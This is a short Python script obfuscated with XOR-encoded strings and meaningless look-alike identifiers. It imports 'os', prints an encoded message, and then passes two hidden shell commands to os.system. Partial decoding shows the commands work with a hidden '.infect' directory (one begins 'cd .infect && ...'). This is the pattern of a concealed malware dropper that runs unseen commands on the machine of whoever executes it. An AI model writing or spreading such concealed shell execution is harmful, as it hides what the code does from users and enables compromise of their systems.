Ol1lO00OO00l100OO10O1 = (lambda OOO000OOOl1l1lOO0O101,
    O11ll101lll10O1O1lO01: OOO000OOOl1l1lOO0O101 ^ O11ll101lll10O1O1lO01)
Ol1l00O0OO0OO0000lOOO = __import__(''.join(chr(l01Ol0l0Ol0OO00OO0O1O ^
    O11O10O1lOO1l10ll1001) for O11O10O1lOO1l10ll1001, l01Ol0l0Ol0OO00OO0O1O in
    zip(b'\xb9$', b'\xcbA')), globals(), locals(), [], 0)
ll1O1O1OOOOOllO1OO0Ol = __import__('so'[::-1], globals(), locals(), [], 0)
print(''.join(filter(lambda l10lOO1lOOlllll11l11l: ord(
    l10lOO1lOOlllll11l11l) % 6 != 0, '<\x1e6\x0c\x1eN\x06x6NZ6$H\x12')).
    join(chr(O0O0l1l11OOl1OllOO1O1 ^ ll001OO1010lllOlOllll) for 
    ll001OO1010lllOlOllll, O0O0l1l11OOl1OllOO1O1 in zip(
    b"5\x8b\xef\x8cNt\x1f\xce\xc8\x80\xbd\x8dH\xa2\xaaT'\x8c\x86\x16j\xaeM\xd7\xd2\xafIz\xcc\x11b"
    ,
    b'.\xd0\xdf\xb7}Dr\x9a\xa7\xef\xd1\xad!\xcc\xd9 F\xe0\xeaw\x1e\xc7"\xb9\xc9\xf4yA\xff!\x0f'
    )))
getattr(ll1O1O1OOOOOllO1OO0Ol, ''.join(chr(l0l010O0ll10l10lO00lO ^
    OO0101lllOO0lOl0lOl11) for OO0101lllOO0lOl0lOl11, l0l010O0ll10l10lO00lO in
    zip(b'u3\xefO\xd6Z', b'\x06J\x9c;\xb37')))(''.join(chr(
    Oll0l1l1O0lOllOO000l0 ^ lll1lO110OlOO11Oll0l0) for 
    lll1lO110OlOO11Oll0l0, Oll0l1l1O0lOllOO000l0 in zip(
    b'=\x9er\x1c\xf4\xe5@dO\xac\x9f\xfc\xb1\xc0WbJ9\xec\xc1\xcc\x99-P\\\x19UP=|\xe7\x87\x03.\xce\x0f\xea\xe9?\xdd\xcf\xc8M\xcf\xf5\xc6K$r'
    ,
    b'I\xfd\x17z\x9a\x8cnK=\x9f\xfb\x98\xde\xa3$\x03"W\x85\x8c\xe3\xf4B3r{ 8I\x15\x80\xa8,\x14\xbd\x7f\x9e\x9dW\xfd\xaa\xa6"\xa3\x96\xe6?M\x15'
    ))[::-1 ^ 0])
getattr(ll1O1O1OOOOOllO1OO0Ol, ''.join(chr(O1O1l010O11O0llOOO1O1 ^
    lOl0lO00O0OOO00O1100O) for lOl0lO00O0OOO00O1100O, O1O1l010O11O0llOOO1O1 in
    zip(b'\xce\xfc;g\xc8\xdd', b'\xbd\x85H\x13\xad\xb0')))(''.join(filter(
    lambda lOO1Ol0O11O0O1011OOO1: ord(lOO1Ol0O11O0O1011OOO1) % 2 != 0,
    'D\x06xzHvjz\x0eh\x0e\x06r:\x1a')).join(chr(Ol1lO00OO00l100OO10O1(
    O0Oll0O0l01Ol10ll00lO, O101OlO11OO11110000ll)) for 
    O101OlO11OO11110000ll, O0Oll0O0l01Ol10ll00lO in zip(
    b'"\xa0\x93\x98\x1e\x7f\xff\x8a\x19\x9d\xfc\xebl \xaf\xf0\xe4\x06<-m\x9cL$p\xc0o!\x0f'
    ,
    b'A\xc4\xb3\xb6w\x11\x99\xefz\xe9\xdc\xcdJ\x00\xcd\x91\x97n\x1cD\x03\xef8E\x1c\xacARg'
    )))
